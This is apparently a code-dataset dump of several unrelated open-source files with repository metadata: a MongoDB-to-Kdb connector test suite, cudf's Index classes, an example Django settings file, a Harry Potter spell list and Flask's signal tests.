assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync("?[.test.test;();0b;()]")) == 1)
self.conn['test']['test'].delete_one({'name': 'paulie'})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync("?[.test.test;();0b;()]")) == 0)
def test_update(self):
"""Test update operations on Kdb.
Need to have the following fields defined in schema.q:
a:`int$(); b_0_c:`int$(); b_10_c:`int$(); b_0_e:`int$();
b_1_d:`int$(); b_1_f:`int$(); b_2_e:`int$()
"""
docman = self.connector.doc_managers[0]
self.conn.test.test.insert_one({"a": 0})
assert_soon(lambda: sum(1 for _ in self._search("()")) == 1)
def check_update(update_spec):
updated = self.conn.test.command(
SON([('findAndModify', 'test'),
('query', {"a": 0}),
('update', update_spec),
('new', True)]))['value']
# Stringify _id to match what will be retrieved from Kdb
updated[u('_id')] = u(updated['_id'])
# Flatten the MongoDB document to match Kdb
updated = docman._clean_doc(updated, 'dummy.namespace', 0)
def update_worked():
replicated = list(self._search("ns:test.test;a=0"))[0]
return replicated == updated
# Allow some time for update to propagate
assert_soon(update_worked)
# Update by adding a field.
# Note that Kdb can't mix types within an array
check_update({"$set": {"b": [{"c": 10}, {"d": 11}]}})
# Update by setting an attribute of a sub-document beyond end of array.
check_update({"$set": {"b.10.c": 42}})
# Update by changing a value within a sub-document (contains array)
check_update({"$inc": {"b.0.c": 1}})
# Update by changing the value within an array
check_update({"$inc": {"b.1.f": 12}})
# Update by adding new bucket to list
check_update({"$push": {"b": {"e": 12}}})
# Update by replacing an entire sub-document
check_update({"$set": {"b.0": {"e": 4}}})
# Update by adding a sub-document
check_update({"$set": {"b": {"0": {"c": 100}}}})
# Update whole document
check_update({"a": 0, "b": {"1": {"d": 10000}}})
def test_rollback(self):
"""Tests rollback. We force a rollback by inserting one doc, killing
primary, adding another doc, killing the new primary, and
restarting both the servers.
"""
primary_conn = self.repl_set.primary.client()
self.conn['test']['test'].insert_one({'name': 'paul'})
assert_soon(
lambda: self.conn.test.test.find({'name': 'paul'}).count() == 1)
assert_soon(
lambda: sum(1 for _ in self.kdb_conn.sync('?[`.test.test;();0b;()]')) == 1)
self.repl_set.primary.stop(destroy=False)
new_primary_conn = self.repl_set.secondary.client()
admin_db = new_primary_conn['admin']
while admin_db.command("isMaster")['ismaster'] is False:
time.sleep(1)
time.sleep(5)
retry_until_ok(self.conn.test.test.insert_one, {'name': 'pauline'})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync('?[`.test.test;();0b;()]')) == 2)
result_set_1 = list(self.kdb_conn.sync('?[`.test.test;enlist(~\:;`name;"pauline");0b;()]'))
result_set_2 = self.conn['test']['test'].find_one({'name': 'pauline'})
self.assertEqual(len(result_set_1), 1)
for item in result_set_1:
self.assertEqual(item['_id'], str(result_set_2['_id']))
self.repl_set.secondary.stop(destroy=False)
self.repl_set.primary.start()
while primary_conn['admin'].command("isMaster")['ismaster'] is False:
time.sleep(1)
self.repl_set.secondary.start()
time.sleep(2)
result_set_1 = self.kdb_conn.sync('?[`.test.test;enlist(~\:;`name;"pauline");0b;()]')
self.assertEqual(sum(1 for _ in result_set_1), 0)
result_set_2 = self.kdb_conn.sync('?[`.test.test;enlist(~\:;`name;"paul");0b;()]')
self.assertEqual(sum(1 for _ in result_set_2), 1)
def test_valid_fields(self):
""" Tests documents with field definitions
"""
inserted_obj = self.conn['test']['test'].insert_one(
{'name': 'test_valid'}).inserted_id
self.conn['test']['test'].update_one(
{'_id': inserted_obj},
{'$set': {'popularity': 1}}
)
docman = self.connector.doc_managers[0]
assert_soon(lambda: sum(1 for _ in self._search("()")) > 0)
result = docman.get_last_doc()
self.assertIn('popularity', result)
self.assertEqual(sum(1 for _ in self._search("name ~\:\"test_valid\"")), 1)
def test_invalid_fields(self):
""" Tests documents without field definitions
"""
inserted_obj = self.conn['test']['test'].insert_one(
{'name': 'test_invalid'}).inserted_id
self.conn['test']['test'].update_one(
{'_id': inserted_obj},
{'$set': {'break_this_test': 1}}
)
docman = self.connector.doc_managers[0]
assert_soon(lambda: sum(1 for _ in self._search("()")) > 0)
result = docman.get_last_doc()
self.assertNotIn('break_this_test', result)
self.assertEqual(sum(1 for _ in self._search(
"name ~\:\"test_invalid\"")), 1)
def test_nested_fields(self):
"""Test indexing fields that are sub-documents in MongoDB
The following fields are defined in the provided schema.q:
billing_address_street:(); billing_address_state:();
numbers_0:(); numbers_1:(): numbers_2:()
characters_0_name:(); characters_0_color:();
characters_1_name:(); characters_1_color:();
characters_2:()
"""
# Connector is already running
self.conn["test"]["test"].insert_one({
"name": "Jeb",
"billing": {
"address": {
"street": "12345 Mariposa Street",
"state": "California"
}
}
})
self.conn["test"]["test"].insert_one({
"numbers": ["one", "two", "three"],
"characters": [
{"name": "Big Bird",
"color": "yellow"},
{"name": "Elmo",
"color": "red"},
"Cookie Monster"
]
})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync("?[`.test.test;();0b;()]")) > 0,
"documents should have been replicated to Kdb")
# Search for first document
results = self.kdb_conn.sync("?[`.test.test;enlist(~\:;`billing_address_street;\"12345 Mariposa Street\");0b;()]")
self.assertEqual(len(results), 1)
self.assertEqual(next(iter(results))["billing_address_state"],
"California")
# Search for second document
results = self.kdb_conn.sync("?[`.test.test;enlist(~\:;`characters_1_color;\"red\");0b;()]")
self.assertEqual(len(results), 1)
self.assertEqual(next(iter(results))["numbers.2"], "three")
results = self.kdb_conn.sync("?[`.test.test;enlist(~\:;`characters_2;\"Cookie Monster\");0b;()]")
self.assertEqual(len(results), 1)
if __name__ == '__main__':
unittest.main()
| 38.769737
| 484
| 0.583828
|
8bd91b71a6ad82c010f685fba40d3e4db4a40478
| 23,287
|
py
|
Python
|
python/cudf/cudf/dataframe/index.py
|
okoskinen/cudf
|
289fc3e29ba0c58fada3a3e998bd193bbca47edd
|
[
"Apache-2.0"
] | null | null | null |
python/cudf/cudf/dataframe/index.py
|
okoskinen/cudf
|
289fc3e29ba0c58fada3a3e998bd193bbca47edd
|
[
"Apache-2.0"
] | null | null | null |
python/cudf/cudf/dataframe/index.py
|
okoskinen/cudf
|
289fc3e29ba0c58fada3a3e998bd193bbca47edd
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2018, NVIDIA CORPORATION.
from __future__ import division, print_function
import pickle
from copy import copy, deepcopy
import numpy as np
import pandas as pd
from numba.cuda.cudadrv.devicearray import DeviceNDArray
import nvstrings
from librmm_cffi import librmm as rmm
import cudf
import cudf.bindings.copying as cpp_copying
from cudf.comm.serialize import register_distributed_serializer
from cudf.dataframe import columnops
from cudf.dataframe.buffer import Buffer
from cudf.dataframe.categorical import CategoricalColumn
from cudf.dataframe.column import Column
from cudf.dataframe.datetime import DatetimeColumn
from cudf.dataframe.numerical import NumericalColumn
from cudf.dataframe.string import StringColumn
from cudf.indexing import _IndexLocIndexer
from cudf.utils import cudautils, ioutils, utils
class Index(object):
"""The root interface for all Series indexes.
"""
def serialize(self, serialize):
"""Serialize into pickle format suitable for file storage or network
transmission.
Parameters
---
serialize: A function provided by register_distributed_serializer
middleware.
"""
header = {}
header["payload"], frames = serialize(pickle.dumps(self))
header["frame_count"] = len(frames)
return header, frames
@classmethod
def deserialize(cls, deserialize, header, frames):
"""Convert from pickle format into Index
Parameters
---
deserialize: A function provided by register_distributed_serializer
middleware.
header: The data header produced by the serialize function.
frames: The serialized data
"""
payload = deserialize(
header["payload"], frames[: header["frame_count"]]
)
return pickle.loads(payload)
def take(self, indices):
"""Gather only the specific subset of indices
Parameters
---
indices: An array-like that maps to values contained in this Index.
"""
assert indices.dtype.kind in "iu"
if indices.size == 0:
# Empty indices
return RangeIndex(indices.size)
else:
# Gather
index = cpp_copying.apply_gather_array(self.gpu_values, indices)
col = self.as_column().replace(data=index.data)
new_index = as_index(col)
new_index.name = self.name
return new_index
def argsort(self, ascending=True):
return self.as_column().argsort(ascending=ascending)
@property
def values(self):
return np.asarray([i for i in self.as_column()])
def to_pandas(self):
return pd.Index(self.as_column().to_pandas(), name=self.name)
def to_arrow(self):
return self.as_column().to_arrow()
@ioutils.doc_to_dlpack()
def to_dlpack(self):
"""{docstring}"""
import cudf.io.dlpack as dlpack
return dlpack.to_dlpack(self)
@property
def gpu_values(self):
return self.as_column().to_gpu_array()
def min(self):
return self.as_column().min()
def max(self):
return self.as_column().max()
def sum(self):
return self.as_column().sum()
def find_segments(self):
"""Return the beginning index for segments
Returns
-------
result : NumericalColumn
"""
segments, _ = self._find_segments()
return segments
def _find_segments(self):
seg, markers = cudautils.find_segments(self.gpu_values)
return NumericalColumn(data=Buffer(seg), dtype=seg.dtype), markers
@classmethod
def _concat(cls, objs):
data = Column._concat([o.as_column() for o in objs])
return as_index(data)
def _apply_op(self, fn, other=None):
from cudf.dataframe.series import Series
idx_series = Series(self, name=self.name)
op = getattr(idx_series, fn)
if other is not None:
return as_index(op(other))
else:
return as_index(op())
def __add__(self, other):
return self._apply_op("__add__", other)
def __radd__(self, other):
return self._apply_op("__radd__", other)
def __sub__(self, other):
return self._apply_op("__sub__", other)
def __rsub__(self, other):
return self._apply_op("__rsub__", other)
def __mul__(self, other):
return self._apply_op("__mul__", other)
def __rmul__(self, other):
return self._apply_op("__rmul__", other)
def __mod__(self, other):
return self._apply_op("__mod__", other)
def __rmod__(self, other):
return self._apply_op("__rmod__", other)
def __pow__(self, other):
return self._apply_op("__pow__", other)
def __floordiv__(self, other):
return self._apply_op("__floordiv__", other)
def __rfloordiv__(self, other):
return self._apply_op("__rfloordiv__", other)
def __truediv__(self, other):
return self._apply_op("__truediv__", other)
def __rtruediv__(self, other):
return self._apply_op("__rtruediv__", other)
__div__ = __truediv__
def __and__(self, other):
return self._apply_op("__and__", other)
def __or__(self, other):
return self._apply_op("__or__", other)
def __xor__(self, other):
return self._apply_op("__xor__", other)
def __eq__(self, other):
return self._apply_op("__eq__", other)
def __ne__(self, other):
return self._apply_op("__ne__", other)
def __lt__(self, other):
return self._apply_op("__lt__", other)
def __le__(self, other):
return self._apply_op("__le__", other)
def __gt__(self, other):
return self._apply_op("__gt__", other)
def __ge__(self, other):
return self._apply_op("__ge__", other)
def equals(self, other):
if self is other:
return True
if len(self) != len(other):
return False
elif len(self) == 1:
val = self[0] == other[0]
            # when self is a multiindex we need to check all values
if isinstance(val, np.ndarray):
return val.all()
return bool(val)
else:
result = self == other
if isinstance(result, bool):
return result
else:
return result._values.all()
def join(self, other, method, how="left", return_indexers=False):
column_join_res = self.as_column().join(
other.as_column(),
how=how,
return_indexers=return_indexers,
method=method,
)
if return_indexers:
joined_col, indexers = column_join_res
joined_index = as_index(joined_col)
return joined_index, indexers
else:
return column_join_res
def rename(self, name):
"""
Alter Index name.
Defaults to returning new index.
Parameters
----------
name : label
Name(s) to set.
Returns
-------
Index
Difference from pandas:
* Not supporting: inplace
"""
out = self.copy(deep=False)
out.name = name
return out.copy(deep=True)
def astype(self, dtype):
"""Convert to the given ``dtype``.
Returns
-------
If the dtype changed, a new ``Index`` is returned by casting each
values to the given dtype.
If the dtype is not changed, ``self`` is returned.
"""
if dtype == self.dtype:
return self
return as_index(self._values.astype(dtype), name=self.name)
def to_array(self, fillna=None):
"""Get a dense numpy array for the data.
Parameters
----------
fillna : str or None
Defaults to None, which will skip null values.
If it equals "pandas", null values are filled with NaNs.
Non integral dtype is promoted to np.float64.
Notes
-----
if ``fillna`` is ``None``, null values are skipped. Therefore, the
output size could be smaller.
"""
return self._values.to_array(fillna=fillna)
def to_series(self):
from cudf.dataframe.series import Series
return Series(self._values)
@property
def loc(self):
return _IndexLocIndexer(self)
@property
def is_unique(self):
raise (NotImplementedError)
@property
def is_monotonic(self):
return self.is_monotonic_increasing
@property
def is_monotonic_increasing(self):
raise (NotImplementedError)
@property
def is_monotonic_decreasing(self):
raise (NotImplementedError)
def get_slice_bound(self, label, side, kind):
raise (NotImplementedError)
class RangeIndex(Index):
"""An iterable integer index defined by a starting value and ending value.
Can be sliced and indexed arbitrarily without allocating memory for the
complete structure.
Properties
---
_start: The first value
_stop: The last value
name: Name of the index
"""
def __init__(self, start, stop=None, name=None):
"""RangeIndex(size), RangeIndex(start, stop)
Parameters
----------
start, stop: int
name: string
"""
if isinstance(start, range):
therange = start
start = therange.start
stop = therange.stop
if stop is None:
start, stop = 0, start
self._start = int(start)
self._stop = int(stop)
self.name = name
def copy(self, deep=True):
if deep:
result = deepcopy(self)
else:
result = copy(self)
result.name = self.name
return result
def __repr__(self):
return (
"{}(start={}, stop={}".format(
self.__class__.__name__, self._start, self._stop
)
+ (
", name='{}'".format(str(self.name))
if self.name is not None
else ""
)
+ ")"
)
def __len__(self):
return max(0, self._stop - self._start)
def __getitem__(self, index):
if isinstance(index, slice):
start, stop, step, sln = utils.standard_python_slice(
len(self), index
)
start += self._start
stop += self._start
if sln == 0:
return RangeIndex(0)
else:
return index_from_range(start, stop, step)
elif isinstance(index, int):
index = utils.normalize_index(index, len(self))
index += self._start
return index
elif isinstance(index, (list, np.ndarray)):
index = np.array(index)
index = rmm.to_device(index)
if isinstance(index, (DeviceNDArray)):
return self.take(index)
else:
raise ValueError(index)
def __eq__(self, other):
return super(type(self), self).__eq__(other)
def equals(self, other):
if self is other:
return True
if len(self) != len(other):
return False
if isinstance(other, cudf.dataframe.index.RangeIndex):
return self._start == other._start and self._stop == other._stop
else:
return (self == other)._values.all()
@property
def dtype(self):
return np.dtype(np.int64)
@property
def _values(self):
return self.as_column()
@property
def is_contiguous(self):
return True
@property
def size(self):
return max(0, self._stop - self._start)
def find_label_range(self, first, last):
# clip first to range
if first is None or first < self._start:
begin = self._start
elif first < self._stop:
begin = first
else:
begin = self._stop
# clip last to range
if last is None:
end = self._stop
elif last < self._start:
end = begin
elif last < self._stop:
end = last + 1
else:
end = self._stop
# shift to index
return begin - self._start, end - self._start
def as_column(self):
if len(self) > 0:
vals = cudautils.arange(self._start, self._stop, dtype=self.dtype)
else:
vals = rmm.device_array(0, dtype=self.dtype)
return NumericalColumn(data=Buffer(vals), dtype=vals.dtype)
def to_gpu_array(self):
return self.as_column().to_gpu_array()
def to_pandas(self):
return pd.RangeIndex(
start=self._start,
stop=self._stop,
dtype=self.dtype,
name=self.name,
)
@property
def is_unique(self):
return True
@property
def is_monotonic_increasing(self):
return self._start <= self._stop
@property
def is_monotonic_decreasing(self):
return self._start >= self._stop
def get_slice_bound(self, label, side, kind):
# TODO: Range-specific implementation here
raise (NotImplementedError)
def index_from_range(start, stop=None, step=None):
vals = cudautils.arange(start, stop, step, dtype=np.int64)
return as_index(vals)
class GenericIndex(Index):
"""An array of orderable values that represent the indices of another Column
Attributes
---
_values: A Column object
name: A string
"""
def __init__(self, values, name=None):
from cudf.dataframe.series import Series
# normalize the input
if isinstance(values, Series):
name = values.name
values = values._column
elif isinstance(values, columnops.TypedColumnBase):
values = values
else:
if isinstance(values, (list, tuple)):
if len(values) == 0:
values = np.asarray([], dtype="int64")
else:
values = np.asarray(values)
values = columnops.as_column(values)
assert isinstance(values, (NumericalColumn, StringColumn))
assert isinstance(values, columnops.TypedColumnBase), type(values)
self._values = values
self.name = name
def copy(self, deep=True):
if deep:
result = deepcopy(self)
else:
result = copy(self)
result._values = self._values.copy(deep)
result.name = self.name
return result
def serialize(self, serialize):
header = {}
header["payload"], frames = serialize(self._values)
header["frame_count"] = len(frames)
return header, frames
@classmethod
def deserialize(cls, deserialize, header, frames):
payload = deserialize(
header["payload"], frames[: header["frame_count"]]
)
return cls(payload)
def __sizeof__(self):
return self._values.__sizeof__()
def __reduce__(self):
return self.__class__, tuple([self._values])
def __len__(self):
return len(self._values)
def __repr__(self):
vals = [self._values[i] for i in range(min(len(self), 10))]
return (
"{}({}, dtype={}".format(
self.__class__.__name__, vals, self._values.dtype
)
+ (
", name='{}'".format(self.name)
if self.name is not None
else ""
)
+ ")"
)
def __getitem__(self, index):
res = self._values[index]
if not isinstance(index, int):
return as_index(res)
else:
return res
def as_column(self):
"""Convert the index as a Series.
"""
return self._values
@property
def dtype(self):
return self._values.dtype
def find_label_range(self, first, last):
"""Find range that starts with *first* and ends with *last*,
inclusively.
Returns
-------
begin, end : 2-tuple of int
The starting index and the ending index.
The *last* value occurs at ``end - 1`` position.
"""
col = self._values
begin, end = None, None
if first is not None:
begin = col.find_first_value(first)
if last is not None:
end = col.find_last_value(last)
end += 1
return begin, end
@property
def is_unique(self):
return self._values.is_unique
@property
def is_monotonic(self):
return self._values.is_monotonic
@property
def is_monotonic_increasing(self):
return self._values.is_monotonic_increasing
@property
def is_monotonic_decreasing(self):
return self._values.is_monotonic_decreasing
def get_slice_bound(self, label, side, kind):
return self._values.get_slice_bound(label, side, kind)
class DatetimeIndex(GenericIndex):
# TODO this constructor should take a timezone or something to be
# consistent with pandas
def __init__(self, values, name=None):
# we should be more strict on what we accept here but
# we'd have to go and figure out all the semantics around
        # pandas dtindex creation first. For now,
# just make sure we handle np.datetime64 arrays
# and then just dispatch upstream
if name is None and hasattr(values, "name"):
name = values.name
if isinstance(values, np.ndarray) and values.dtype.kind == "M":
values = DatetimeColumn.from_numpy(values)
elif isinstance(values, pd.DatetimeIndex):
values = DatetimeColumn.from_numpy(values.values)
elif isinstance(values, (list, tuple)):
values = DatetimeColumn.from_numpy(
np.array(values, dtype="<M8[ms]")
)
assert values.null_count == 0
self._values = values
self.name = name
@property
def year(self):
return self.get_dt_field("year")
@property
def month(self):
return self.get_dt_field("month")
@property
def day(self):
return self.get_dt_field("day")
@property
def hour(self):
return self.get_dt_field("hour")
@property
def minute(self):
return self.get_dt_field("minute")
@property
def second(self):
return self.get_dt_field("second")
def get_dt_field(self, field):
out_column = self._values.get_dt_field(field)
# columnops.column_empty_like always returns a Column object
# but we need a NumericalColumn for GenericIndex..
# how should this be handled?
out_column = NumericalColumn(
data=out_column.data,
mask=out_column.mask,
null_count=out_column.null_count,
dtype=out_column.dtype,
name=self.name,
)
return as_index(out_column)
class CategoricalIndex(GenericIndex):
"""An categorical of orderable values that represent the indices of another
Column
Attributes
---
_values: A CategoricalColumn object
name: A string
"""
def __init__(self, values, name=None):
if isinstance(values, CategoricalColumn):
values = values
elif isinstance(
values, pd.Series
) and pd.api.types.is_categorical_dtype(values.dtype):
values = CategoricalColumn(
data=Buffer(values.cat.codes.values),
categories=values.cat.categories,
ordered=values.cat.ordered,
)
elif isinstance(values, (pd.Categorical, pd.CategoricalIndex)):
values = CategoricalColumn(
data=Buffer(values.codes),
categories=values.categories,
ordered=values.ordered,
)
elif isinstance(values, (list, tuple)):
values = columnops.as_column(
pd.Categorical(values, categories=values)
)
assert values.null_count == 0
self._values = values
self.name = name
self.names = [name]
@property
def codes(self):
return self._values.codes
@property
def categories(self):
return self._values.cat().categories
class StringIndex(GenericIndex):
"""String defined indices into another Column
Attributes
---
_values: A StringColumn object or NDArray of strings
name: A string
"""
def __init__(self, values, name=None):
if isinstance(values, StringColumn):
self._values = values.copy()
elif isinstance(values, StringIndex):
if name is None:
name = values.name
self._values = values._values.copy()
else:
self._values = columnops.build_column(
nvstrings.to_device(values), dtype="object"
)
assert self._values.null_count == 0
self.name = name
@property
def codes(self):
return self._values.codes
@property
def categories(self):
return self._values.categories
def to_pandas(self):
result = pd.Index(self.values, name=self.name, dtype="object")
return result
def take(self, indices):
return columnops.as_column(self._values).element_indexing(indices)
def __repr__(self):
return (
"{}({}, dtype='object'".format(
self.__class__.__name__, self._values.to_array()
)
+ (
", name='{}'".format(self.name)
if self.name is not None
else ""
)
+ ")"
)
def as_index(arbitrary, name=None):
"""Create an Index from an arbitrary object
Currently supported inputs are:
* ``Column``
* ``Buffer``
* ``Series``
* ``Index``
* numba device array
* numpy array
* pyarrow array
* pandas.Categorical
Returns
-------
result : subclass of Index
- CategoricalIndex for Categorical input.
- DatetimeIndex for Datetime input.
- GenericIndex for all other inputs.
"""
# This function should probably be moved to Index.__new__
if hasattr(arbitrary, "name") and name is None:
name = arbitrary.name
if isinstance(arbitrary, Index):
return arbitrary.rename(name=name)
elif isinstance(arbitrary, NumericalColumn):
return GenericIndex(arbitrary, name=name)
elif isinstance(arbitrary, StringColumn):
return StringIndex(arbitrary, name=name)
elif isinstance(arbitrary, DatetimeColumn):
return DatetimeIndex(arbitrary, name=name)
elif isinstance(arbitrary, CategoricalColumn):
return CategoricalIndex(arbitrary, name=name)
else:
return as_index(columnops.as_column(arbitrary), name=name)
register_distributed_serializer(RangeIndex)
register_distributed_serializer(GenericIndex)
register_distributed_serializer(DatetimeIndex)
register_distributed_serializer(CategoricalIndex)
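# Illustrative sketch, not part of the original module: as_index dispatches on the
# input type as described in its docstring. Running these calls requires a CUDA-capable
# environment with cudf's dependencies installed, so this is only a sketch:
#     as_index(np.arange(3), name="example")        # -> GenericIndex over a NumericalColumn
#     as_index(pd.Categorical(["a", "b", "a"]))     # -> CategoricalIndex
#     as_index(np.array(["2019-01-01"], dtype="datetime64[ms]"))  # -> DatetimeIndex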
| 27.989183
| 80
| 0.594366
|
f43bec8358669f7090ff3ebc99c1b92215e56635
| 2,084
|
py
|
Python
|
example/example/settings.py
|
TargetHolding/django-ladon
|
3e454e4e3a6487a5a90fe35894b9a1fe7e4c47d5
|
[
"MIT"
] | 2
|
2015-10-20T05:54:49.000Z
|
2017-03-22T17:39:28.000Z
|
example/example/settings.py
|
TargetHolding/django-ladon
|
3e454e4e3a6487a5a90fe35894b9a1fe7e4c47d5
|
[
"MIT"
] | null | null | null |
example/example/settings.py
|
TargetHolding/django-ladon
|
3e454e4e3a6487a5a90fe35894b9a1fe7e4c47d5
|
[
"MIT"
] | null | null | null |
"""
Django settings for example project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')i+o9r4)#r%xr@p1s=^79n3o+9hat@cluxhp-bjkora(x#_ixa'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'calculator',
'django_ladon',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'example.urls'
WSGI_APPLICATION = 'example.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
| 23.954023
| 71
| 0.732726
|
ca6bb02550ea56037df04acfd6ec66d59d777f85
| 2,154
|
py
|
Python
|
potterscript/spells.py
|
madreains/OrkoHunter
|
ab8b9e3e9323a4a26a12f6d057f953f9a685f724
|
[
"MIT"
] | 16
|
2016-05-09T06:24:38.000Z
|
2021-06-29T02:28:05.000Z
|
potterscript/spells.py
|
madreains/OrkoHunter
|
ab8b9e3e9323a4a26a12f6d057f953f9a685f724
|
[
"MIT"
] | 3
|
2016-05-09T20:50:36.000Z
|
2017-05-29T11:02:19.000Z
|
potterscript/spells.py
|
madreains/OrkoHunter
|
ab8b9e3e9323a4a26a12f6d057f953f9a685f724
|
[
"MIT"
] | 3
|
2016-05-09T20:03:05.000Z
|
2020-11-23T08:29:00.000Z
|
import random
def gen_random():
index = random.randint(0, len(spells) - 1)
return spells[index]
spells = ('Accio',
'Aguamenti',
'Alohomora',
'Anapneo',
'Aparecium',
'Avada Kedavra',
'Avis',
'Capacious Extremis',
'Cave Inimicum',
'Colloportus',
'Confringo',
'Confundo',
'Crucio',
'Defodio',
'Deletrius',
'Densaugeo',
'Deprimo',
'Descendo',
'Diffindo',
'Duro',
'Engorgio',
'Episkey',
'Erecto',
'Evanesco',
'Expecto Patronum',
'Expelliarmus',
'Expulso',
'Ferula',
'Finite Incantatem',
'Flagrate',
'Furnunculus',
'Geminio',
'Glisseo',
'Homenum Revelio',
'Impedimenta',
'Imperio',
'Impervius',
'Incarcerous',
'Incendio',
'Langlock',
'Legilimens',
'Levicorpus',
'Liberacorpus',
'Locomotor',
'Locomotor Mortis',
'Lumos',
'Meteolojinx Recanto',
'Mobiliarbus',
'Mobilicorpus',
'Morsmordre',
'Muffliato',
'Nox',
'Obliviate',
'Obscuro',
'Oppugno',
'Orchideous',
'Pack',
'Petrificus Totalus',
'Piertotum Locomotor',
'Point Me',
'Portus',
'Prior Incantato',
'Protego',
'Protego Horribilis',
'Protego Totalum',
'Quietus',
'Reducio',
'Reducto',
'Relashio',
'Rennervate',
'Reparo',
'Repello Muggletum',
'Rictusempra',
'Riddikulus',
'Salvio Hexia',
'Scourgify',
'Sectumsempra',
'Serpensortia',
'Silencio',
'Sonorus',
'Specialis Revelio',
'Stupefy',
'Tarantallegra',
'Tergeo',
'Waddiwasi',
'Wingardium Leviosa')
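if __name__ == '__main__':
    # Illustrative usage, not part of the original module: print one random spell.
    print(gen_random())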
| 23.16129
| 46
| 0.41922
|
45ca45d9bf7d8bf00fa945c0610794f4e0248b95
| 4,806
|
py
|
Python
|
flask/testsuite/signals.py
|
coolinzhong/flask
|
29f3a1ac237f75ca9f330a3c285a5a4d12b0dadb
|
[
"BSD-3-Clause"
] | 33
|
2015-03-17T16:04:16.000Z
|
2020-10-26T06:12:30.000Z
|
flask/testsuite/signals.py
|
tladudtn/flask
|
35f106643c41387a4304b4fe95729c678f429c23
|
[
"BSD-3-Clause"
] | 19
|
2015-03-03T07:56:39.000Z
|
2020-01-22T15:06:38.000Z
|
flask/testsuite/signals.py
|
tladudtn/flask
|
35f106643c41387a4304b4fe95729c678f429c23
|
[
"BSD-3-Clause"
] | 64
|
2015-01-19T06:06:00.000Z
|
2022-01-20T01:09:35.000Z
|
# -*- coding: utf-8 -*-
"""
flask.testsuite.signals
~~~~~~~~~~~~~~~~~~~~~~~
Signalling.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import flask
import unittest
from flask.testsuite import FlaskTestCase
class SignalsTestCase(FlaskTestCase):
def test_template_rendered(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('simple_template.html', whiskey=42)
recorded = []
def record(sender, template, context):
recorded.append((template, context))
flask.template_rendered.connect(record, app)
try:
app.test_client().get('/')
self.assert_equal(len(recorded), 1)
template, context = recorded[0]
self.assert_equal(template.name, 'simple_template.html')
self.assert_equal(context['whiskey'], 42)
finally:
flask.template_rendered.disconnect(record, app)
def test_request_signals(self):
app = flask.Flask(__name__)
calls = []
def before_request_signal(sender):
calls.append('before-signal')
def after_request_signal(sender, response):
self.assert_equal(response.data, b'stuff')
calls.append('after-signal')
@app.before_request
def before_request_handler():
calls.append('before-handler')
@app.after_request
def after_request_handler(response):
calls.append('after-handler')
response.data = 'stuff'
return response
@app.route('/')
def index():
calls.append('handler')
return 'ignored anyway'
flask.request_started.connect(before_request_signal, app)
flask.request_finished.connect(after_request_signal, app)
try:
rv = app.test_client().get('/')
self.assert_equal(rv.data, b'stuff')
self.assert_equal(calls, ['before-signal', 'before-handler',
'handler', 'after-handler',
'after-signal'])
finally:
flask.request_started.disconnect(before_request_signal, app)
flask.request_finished.disconnect(after_request_signal, app)
def test_request_exception_signal(self):
app = flask.Flask(__name__)
recorded = []
@app.route('/')
def index():
1 // 0
def record(sender, exception):
recorded.append(exception)
flask.got_request_exception.connect(record, app)
try:
self.assert_equal(app.test_client().get('/').status_code, 500)
self.assert_equal(len(recorded), 1)
self.assert_true(isinstance(recorded[0], ZeroDivisionError))
finally:
flask.got_request_exception.disconnect(record, app)
def test_appcontext_signals(self):
app = flask.Flask(__name__)
recorded = []
def record_push(sender, **kwargs):
recorded.append('push')
def record_pop(sender, **kwargs):
recorded.append('pop')
@app.route('/')
def index():
return 'Hello'
flask.appcontext_pushed.connect(record_push, app)
flask.appcontext_popped.connect(record_pop, app)
try:
with app.test_client() as c:
rv = c.get('/')
self.assert_equal(rv.data, b'Hello')
self.assert_equal(recorded, ['push'])
self.assert_equal(recorded, ['push', 'pop'])
finally:
flask.appcontext_pushed.disconnect(record_push, app)
flask.appcontext_popped.disconnect(record_pop, app)
def test_flash_signal(self):
app = flask.Flask(__name__)
app.config['SECRET_KEY'] = 'secret'
@app.route('/')
def index():
flask.flash('This is a flash message', category='notice')
return flask.redirect('/other')
recorded = []
def record(sender, message, category):
recorded.append((message, category))
flask.message_flashed.connect(record, app)
try:
client = app.test_client()
with client.session_transaction():
client.get('/')
self.assert_equal(len(recorded), 1)
message, category = recorded[0]
self.assert_equal(message, 'This is a flash message')
self.assert_equal(category, 'notice')
finally:
flask.message_flashed.disconnect(record, app)
def suite():
suite = unittest.TestSuite()
if flask.signals_available:
suite.addTest(unittest.makeSuite(SignalsTestCase))
return suite
| 31.207792
| 76
| 0.584062
|
